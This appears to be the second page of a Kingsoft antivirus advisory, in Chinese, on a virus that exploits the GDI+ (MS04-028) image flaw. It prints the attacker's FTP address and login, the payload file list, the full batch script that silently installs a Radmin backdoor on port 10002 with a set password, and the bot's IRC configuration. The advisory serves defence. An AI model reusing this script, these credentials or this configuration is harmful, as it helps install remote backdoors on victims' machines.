病毒简介:

　　金山反病毒中心介绍，该病毒利用MS04-028的GDI+漏洞，如果用户机器没有打相应补丁，并使用资源管理器浏览了该文件，可能导致用户机器从连接木马种植者指定的FTP地址，并从该FTP下载木马文件，并运行这些木马，以达到远程监控感染机器目的

　　技术细节:

　　当用户通过资源管理器浏览该文件后，病毒会利用GDI+漏洞，尝试溢出执行下载命令。如果溢出失败，则会导致资源管理器崩溃

　　如果溢出成功，则病毒尝试从以下FTP上下载远程控制文件

　　ftp://2××.1××.4×.2×/www/system/

　　文件包括：

　　文件名 大小

　　AdmDll.dll 90112

　　Fport.exe 114688

　　ServUStartUpLog.txt 663

　　VNCHooks.dll 32768

　　WinRun.dll 1407

　　WinRun.exe 811008

　　driver.log 1268

　　drives.exe 24576

　　execute.bat 150

　　filter3.ocx 0

　　irc-u.cfg 1052

　　irc-u.dat 0

　　irc-u.debug.log 16802

　　irc-u.dll 102400

　　kill.exe 26624

　　nc.exe 59392

　　nvsvc.exe 241664

　　nvsvc32.dll 36864

　　omnithread_rt.dll 45056

　　peek.exe 34304

　　raddrv.dll 29408

　　radmin.reg 713

　　rcrypt.exe 26112

　　reg.exe 40960

　　uptime.exe 6656

　　vns.exe 208896

　　3、运行execute.bat 文件，通过Radmin远程管理工具，建立后门，端口为10002。

　　4、会建立一个IRC连接，连接到#FurQ频道。

　　0.其他信息:

　　FTP地址如下：

　　ftp://209.171.43.27/www/system/

　　用户名：bawz

　　密码：pagdba

　　execute.bat 内容如下

　　regedit.exe /s radmin.reg

　　nvsvc.exe /install /silence

　　nvsvc.exe /pass:hardcore /port:10002 /save /silence

　　nvsvc.exe /start /silence

　　net start r_server

　　IRC配置文件如下：

　　server1=irc.p2pchat.net

　　port1=7777

　　login=Darkbro0d

　　channel=#FurQ

　　password=letmein

　　nick1=Track100Mbit

　　nick2=Trck100#1

　　sfv=1

　　user=Trackmaster

　　login=darkbro0d

　　目前，金山毒霸已经进行了紧急病毒库升级，可以防杀利用此漏洞制造的图片病毒。欲了解更多相关信息请登陆db.kingsoft.com 信息安全网站。

上一页  [1] [2]